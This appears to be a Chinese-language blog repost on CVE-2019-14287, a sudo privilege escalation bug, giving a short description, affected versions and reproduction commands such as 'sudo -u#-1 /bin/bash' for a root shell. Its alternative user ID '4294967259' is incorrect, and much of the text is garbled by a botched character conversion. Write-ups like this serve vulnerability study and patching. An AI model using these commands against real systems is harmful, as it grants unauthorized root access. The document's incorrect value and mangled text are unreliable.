CVE-2019-14287(sudo提权)
生活随笔
收集整理的這篇文章主要介紹了
CVE-2019-14287(sudo提权)
小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
文章目錄
- 漏洞描述
- 影響版本
- 復(fù)現(xiàn)
漏洞描述
如果sudo配置允許用戶通過(guò)Runas規(guī)范中定義的ALL關(guān)鍵字來(lái)以任意用戶身份運(yùn)行命令,那么攻擊者有可能通過(guò)制定用戶ID以root權(quán)限執(zhí)行惡意命令
影響版本
sudo版本<1.8.28
查看sudo版本命令
sudo -V
復(fù)現(xiàn)
前提:需要知道普通賬號(hào)密碼
以root身份執(zhí)行命令: sudo -u#-1 id 或 sudo -u#4294967259 whoami以root身份登錄: sudo -u#-1 /bin/bash 或 sudo -u#4294967259 /bin/bash總結(jié)
以上是生活随笔為你收集整理的CVE-2019-14287(sudo提权)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 番茄小说APP怎么退出全屏阅读
- 下一篇: CVE-2020-0796复现(poc+